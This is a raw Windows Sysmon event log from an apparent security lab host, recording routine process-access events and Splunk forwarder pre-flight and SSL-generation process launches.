13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.113{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E59-6005-4700-00000000A301}39563960C:\Windows\system32\cmd.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.101{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 